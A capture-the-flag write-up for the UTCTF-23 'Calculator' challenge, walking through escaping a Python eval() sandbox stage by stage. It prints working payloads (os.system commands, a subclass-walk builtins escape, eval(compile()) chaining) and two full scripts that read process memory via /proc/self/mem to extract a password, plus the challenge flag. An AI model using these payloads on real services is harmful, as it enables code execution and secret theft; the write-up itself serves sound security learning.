Playing read() and seek(): The eval() is not enough

The Information & Systems Security Society, a student-run organization in the Department of Computer Science at the University of Texas at Austin, held the UTCTF-23 in March 2023. I recently moved into a new flat and still needed to celebrate that, so I invited some friends and we hacked our way to 28th place with our CTF team Mate Malochers!

There was this cool Calculator challenge in the Misc category (which was later moved to web, I believe?). During the CTF, we found a creative solution which is far from being the intended solution. But we learned a lot on the journey, so here’s the writeup for that!

Objective⌗

Visiting the website gives you two input fields:

There are multiple stages, where the next stage comes up if you solve the current one. Per stage, you are given a password to mark the stage as solved. After 4 stages, you get the flag.

If you want to spin up the challenge in your lab, here’s the source code. Thanks to ISSS team member Jeriah for pointing me into the right direction!

Warming up⌗

We don’t know what this application does under the hood, but “it will even do math for you” part rang the python eval bells.

So, let’s enter Stage 0 and try __import__("os").system('ls -l'). Et voilá, we get a dirlisting.

Two files show up, password.txt and problem.py. The former is the password for the stage (to be filled into the first input field on the screenshot) and is our goal when solving the challenges. The latter is the script where our input gets fed in. In case of the first stage, it looks like this:

import random
password = open("password.txt").read()
solution = random.getrandbits(32)

answer = input()
result = eval(answer)

if result == solution:
    print(f"{result}, correct!  The password is '{password}'.")
else:
    print(f"Result: {result}.  The correct answer was {solution}.")

Very simple. And because eval() includes local variables in its runtime, entering solution on the website is sufficient to solve the first stage.

One Trick Pony⌗

Stage 1 is still easy. We again grab the challenge source by entering __import__("os").system('cat problem.py') and see that the solution for the first stage is patched in the second stage:

import random
password = open("password.txt").read()
solution = random.getrandbits(32)

answer = input()
# No locals allowed!
result = eval(answer, {"open": None})

if result == solution:
    print(f"{result}, correct!  The password is '{password}'.")
else:
    print(f"Result: {result}.  The correct answer was {solution}.")

Even worse, the open function is patched out, which would’ve been another easy solution.

Still no problem for us. The solution to get the challenge source also works for getting the password, obviously. __import__("os").system('cat password.txt') and we move on to the next stage.

Now you got my attention⌗

We arrive at the gates of Stage 2, notice a pattern in our last actions and cat the password:

Hrm. Well, that would’ve been too easy. After all, it worked for two stages. Time to get our hands dirty.

The problem.py script reads as follows:

import random, os
password = open("password.txt").read()
os.remove("password.txt") # No more reading the file!

solution = random.getrandbits(32)

answer = input()
result = eval(answer, {})

if result == solution:
    print(f"{result}, correct!  The password is '{password}'.")
else:
    print(f"Result: {result}.  The correct answer was {solution}.")

Hm, wait. We can’t simply get the solution variable, as the eval call omits locals through the specification of an empty list. We also cannot cat the problem as on Stage 1.

Now, this is the choose your own adventure part of this writeup. I can offer you the intended solution and the unintended solution.

Dig deep⌗

The official solution is well-described on GitHub. The idea was to dig your way through the python internals to get the password which is still in memory.

There is also this really detailed description by The Fireshell Security team. Their solution is awesome: they found out that the random.getrandbits value can be restored by looking sharply onto the random state and doing some bruteforcing.

Diggin’ deeper⌗

I don’t like the python internals. I know I’m not alone with that. Messing around with those __strange__[arrays](0) always hurts my brain a little, so I try to avoid that. More important: right before me and my team were able to get our hands dirty, our pizza arrived. So we got some time to think about creative solutions for Stage 2 which, in best case, don’t involve the python internals at all.

And here it is.

Let’s lay out the facts:

First of all, we can read any file and have a full shell inside the address space of the binary we are interested in.
We also know that the interesting bits are still loaded in memory.
This means that we can ignore the fact that the original file isn’t present anymore.
However we only have one shot and the binary will shut down afterwards.

But how can we access the memory of the binary?

There is the /proc filesystem which contains, in short, a subdirectory for each running process. There are alot of interesting information stored in the files inside those subdirectories, and it would exceed this writeup by far, so we focus on the interesting parts.

Remember, our goal is to read the password from the process memory. So we have a look at the process map, which contains the memory mapping of the binary. Running open("/proc/self/maps").read() gives us:

That’s a lot of information, but we can ignore most of the contents for the moment. The libraries and the python binary itself are not of interest for the moment. Leaves us with 11 memory areas. But in which of the remaining areas is our password?

Spinning up a gdb instance on the python binary gives us nudges into the right direction:

Note that the heap values actually belong to the interactive console. The true interesting entry is the mapped region. We have multiple of those mapped, unnamed regions in our memory map.

Let’s focus on the first unnamed mapped region, which is in the 11th position in the list. The start address of that region is valuable to us. int(open("/proc/self/maps").read().split("\n")[10].split(" ")[0].split("-")[0],16) does the trick.

If that was too fast, let’s dissamble it:

open("/proc/self/maps").read() gives us the memory map file, seen in the screenshot above
open("/proc/self/maps").read().split("\n")[10] gives us the 11th line of that map file
open("/proc/self/maps").read().split("\n")[10].split(" ")[0] splits the line by the first space, which is the delimiter between the two addresses and the permissions of the map.
open("/proc/self/maps").read().split("\n")[10].split(" ")[0].split("-")[0] splits the address line (which is 1234...DEF-987...321 at that point) and takes the first part, the start address
int(open("/proc/self/maps").read().split("\n")[10].split(" ")[0].split("-")[0],16) treats the first address as Hex (base 16) value and parses it into an integer

But just the address on its own is not of value to us if we still can’t read the memory its pointing at. That’s where the special file /proc/self/mem comes into play. You can’t just cat it, as it is a direct mapping of the memory. As we can see in the memory map screenshot above, there’s nothing at the first thousand bytes - so reading right from the start fails. We need to seek first. But before we can do that, we need to solve another problem: the eval() function doesn’t support assignment of variables. It also doesn’t support multiple lines of code, either. Our exploit code so far was a single, daisy-chained command. But fseek doesn’t return anything useful, so daisychaining would fail at this point.

While we can’t change the fact that eval() doesn’t like multilines and variable assignments, we can give it something else to chew on: Python bytecode. It can be created from within python using the compile() command and supports multiple lines, variables, and so on. We give it a try with eval(compile("print(1);print(2)", "<string>", "single")) and receive 1\n2 as output. Yay! You may ask why it’s wrapped in another eval call. That’s because compile will return, once executed, bytecode only. It won’t run it. So eval(compile()) creates the bytecode as a string, and the outer eval in the problem.py script actually executes the bytecode.

Ok, so now, let’s seek in the binaries’ memory!

with open("/proc/self/mem", "rb") as f:
    start = int(open("/proc/self/maps").read().split(chr(10))[10].split(chr(32))[0].split("-")[0],16)
    n = f.seek(start)
    b=""
    while(True):
        print(f.read(1024))

We wrap it in eval and compile and run it on the server:

That actually looks like memory. Nice!

The next challenge is that we’re searching for a needle in a haystack - with the added bonus that we don’t know how that needle looks like. Hrm. However, we know how long ~~the needle~~ our password is. The other passwords were 20 characters long, purely alphanumeric. We assume this is also the case here.

Throwing regex at our problem gives us

with open("/proc/self/mem", "rb") as f:
    start = int(open("/proc/self/maps").read().split(chr(10))[10].split(chr(32))[0].split("-")[0],16)
    n = f.seek(start)
    print(__import__("re").findall(rb"[a-zA-Z0-9]{20}", f.read(1024)))

But when we increase the amount of bytes read by f.read, the website doesn’t show any output at all. Maybe it’s running into a timeout? Means we’re stuck with a slice of memory.

Time to write a script. We automate the process of sending our payload to the server using the requests library and use a sliding window of memory, in which we search for 20 character long alphanumeric strings. Sliding window means: we have a look onto the first 1024 bytes in the first run, then we look at bytes from 1024 to 2048, then from 2048 to 3072, and so on.

This will take time, but also makes sure that we evaluate the whole memory of the application.

import requests
from bs4 import BeautifulSoup

# cookie value from "misc-calculator-session"
SESSION_VALUE = "DoIS3GTbpBEVDP8aqj1+ZHkCPsG9N4gOtQyXlizwGIQ=hpQUHh3nvdm5XV0XQFBYfQGyA1rC8Z1GHrWByUlu58+eOjMu4xdHSJHiduz11OGgrW+By2Nq8INlUXCd/pSw2g=="
URL = "http://127.0.0.1:5957"
CHUNKSIZE = 1024

# Get a slice of CHUNKSIZE at position mappos*CHUNKSIZE from memory map number mapnum
def run(mapnum, mappos):
    exploit = f"""
with open("/proc/self/mem", "rb") as f:
    start = int(open("/proc/self/maps").read().split(chr(10))[{mapnum}].split(chr(32))[0].split("-")[0],16)
    n = f.seek(start + {mappos * CHUNKSIZE})
    print(__import__("re").findall(rb"[a-zA-Z0-9]{chr(123)}20{chr(125)}", f.read({CHUNKSIZE})))
"""
    pre = send(exploit)
    if pre == "":
        # re-run
        run(mapnum, mappos)
    else:
        print(f"mapnum={mapnum} mappos={mappos}\t{pre}\r", end="")
        if pre != "[]" and not "Traceback (most recent call last)" in pre:
            print("")

# returns the size of memory map number mapnum
def getSize(mapnum):
    exploit = f"""
with open("/proc/self/mem", "rb") as f:
    print(open("/proc/self/maps").read().split(chr(10))[{mapnum}].split(chr(32))[0])
"""
    e = send(exploit)
    start, end = e.split("-")
    return int(end, 16) - int(start, 16)

# send the exploit
def send(exploit):
    # prepare exploit
    exploit = exploit.replace("\n","\\n").replace("\t","\\t")
    exploit = f"eval(compile('{exploit}','<string>','single'))"
    r = requests.post(URL,
            cookies={"misc-calculator-session": SESSION_VALUE},
            headers={"Accept-Encoding": "gzip", "Content-Type": "application/x-www-form-urlencoded"},
            data={"expression": exploit, "type": "calculate", "level": "2"})
    return parseResponse(r)


# parses the given response, returns the contents of <pre>, where the output of the script is
def parseResponse(req):
    parsed_html = BeautifulSoup(req.text, features="lxml")
    pre = parsed_html.body.find('pre').text
    pre = pre[:pre.rfind("Result:")].rstrip("\n").replace("\n", "\\n")
    return pre

# your typical main function
def main():
    mapnum = 7
    size = getSize(mapnum)
    iterations = int(size / CHUNKSIZE)
    print(f"Targetting map area {mapnum} (size {size}), {iterations} iterations")
    for mappos in range(iterations):
        run(mapnum, mappos)

if __name__ == '__main__':
    main()

Let’s discuss those functions:

main() kicks off the search over the whole memory area
getSize(mapnum) returns the size (end address - start address) of the specified memory area
run(mapnum, mappos) gets the specifed memory area. Remember, we can only observe 1024 bytes at once, so this function implements the sliding window. Basically the function checks the memory area [(mappos - 1) * CHUNKSIZE , mappos * CHUNKSIZE] of the memory mapping with number mapnum.
send(exploit) prepares and sends the exploit to the server
parseResponse(req) parses the given HTML response. We’re only interested in a small part of the response: the script output, enclosed in <pre></pre> tags.

We run it, grab a Mate and wait until the script spits out some strings from memory. And after a few minutes, we see a string which looks exactly like the other passwords!

Yay! It worked! Stage 2 finally solved!

I know that one⌗

Stage 3 is surely not a piece of cake after all. We assume that eval() is locked down even more - most likely, the builtins get overridden. This is a problem for our exploit and it’s even difficult to get the source code of this stage.

After consulting HackTricks for python sandbox escapes and playing around with the input field on the challenge website again, this exploit worked: ().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['__import__']('os').system('ls')

That’s not easy to understand on first sight, so let’s disassemble it again:

() creates a simple Python object. "1337" would’ve worked, too.
().__class__.__bases__[0].__subclasses__() goes up the class hierarchy tree to the base, and gives us all subclasses of the base class.
().__class__.__bases__[0].__subclasses__()[137] is the desired warnings.catch_warnings class, see HackTricks notes on that.
().__class__.__bases__[0].__subclasses__()[137]() creates an instance of warnings.catch_warnings class
().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__ accesses the builtins through this class instance.
().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['__import__']('os').system('ls') well, this should look familiar now.

How on earth did I know that it’s the 138th element in the list? That one is simple: get the whole list of subclasses and count… This is also the point where your mileage may vary, because it is really implementation-specific which modules are loaded by python. So make sure to check the list on the server, not on your local machine.

OK, now we just need to alter our exploit accordingly…

Replacing every builtin function with its ().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['foo'] counterpart.

import requests
from bs4 import BeautifulSoup

# cookie value from "misc-calculator-session"
SESSION_VALUE = "DoIS3GTbpBEVDP8aqj1+ZHkCPsG9N4gOtQyXlizwGIQ=hpQUHh3nvdm5XV0XQFBYfQGyA1rC8Z1GHrWByUlu58+eOjMu4xdHSJHiduz11OGgrW+By2Nq8INlUXCd/pSw2g=="
URL = "http://127.0.0.1:5957"
CHUNKSIZE = 1024

# Get a slice of CHUNKSIZE at position mappos*CHUNKSIZE from memory map number mapnum
def run(mapnum, mappos):
    exploit = f"""
with ().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["open"]("/proc/self/mem", "rb") as f:
    start = ().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["int"](().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["open"]("/proc/self/maps").read().split(().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["chr"](10))[{mapnum}].split(().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["chr"](32))[0].split("-")[0],16)
    n = f.seek(start + {mappos * CHUNKSIZE})
    ().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["print"](().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["__import__"]("re").findall(rb"[a-zA-Z0-9]{chr(123)}20{chr(125)}", f.read({CHUNKSIZE})))
"""
    pre = send(exploit)
    if pre == "":
        # re-run
        run(mapnum, mappos)
    else:
        print(f"mapnum={mapnum} mappos={mappos}\t{pre}\r", end="")
        if pre != "[]" and not "Traceback (most recent call last)" in pre:
            print("")

# returns the size of memory map number mapnum
def getSize(mapnum):
    exploit = f"""
().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["print"](().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["open"]("/proc/self/maps").read().split(().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["chr"](10))[{mapnum}].split(().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__["chr"](32))[0])
"""
    start, end = send(exploit).split("-")
    return int(end, 16) - int(start, 16)

# send the exploit
def send(exploit):
    # prepare exploit
    exploit = exploit.lstrip("\n").rstrip("\n").replace("\n","\\n").replace("\t","\\t")
    exploit = f"().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['eval'](().__class__.__bases__[0].__subclasses__()[137]()._module.__builtins__['compile']('{exploit}','<string>','single'))"
    r = requests.post(URL,
            cookies={"misc-calculator-session": SESSION_VALUE},
            headers={"Accept-Encoding": "gzip", "Content-Type": "application/x-www-form-urlencoded"},
            data={"expression": exploit, "type": "calculate", "level": "3"})
    return parseResponse(r)


# parses the given response, returns the contents of <pre>, where the output of the script is
def parseResponse(req):
    parsed_html = BeautifulSoup(req.text, features="lxml")
    pre = parsed_html.body.find('pre').text
    pre = pre[:pre.rfind("Result:")].rstrip("\n").replace("\n", "\\n")
    return pre

# your typical main function
def main():
    mapnum = 7
    size = getSize(mapnum)
    iterations = int(size / CHUNKSIZE)
    print(f"Targetting map area {mapnum} (size {size}), {iterations} iterations")
    for mappos in range(1050, iterations):
        run(mapnum, mappos)

if __name__ == '__main__':
    main()

Note that we can do an educated guess here, as we already know where the flag is! The for loop in the main() function is altered accordingly and starts off at the 1050th position.

Running the adjusted exploit gives us the password after a few seconds:

After entering that in the password field, we finally get the flag utflag{LGvb7PJXG5JDwhsEW7xp}! Very cool.

Conclusion⌗

This was a fun rollercoaster ride through the bits and bytes of a Python 3.8.10 instance.

It was not the fastest solution, nor the prettiest, nor the shortest, but… well, it was a creative solution after all!

Learnings from this writeup are:

the /proc filesystem can be really powerful, especially if you only have arbitrary read (and seek)
iterating through huge areas of memory using a sliding window works quite well
- Note to self: I was very lucky. This solution wouldn’t have worked if the password was’nt fully in the window; the RegEx would’ve failed then. Either move the window by half the window size each time or lower the RegEx to half of the actual length to avoid missing the password.
eval doesn’t like multilines, but eval likes compile()d bytecode, and compile() supports multilines
This solution would’ve worked with any bit of information stored in memory. It certainly helps to know what to look for though.
This was far from being the official solution path. And that’s awesome!

Stay safe, have fun, and hack the planet!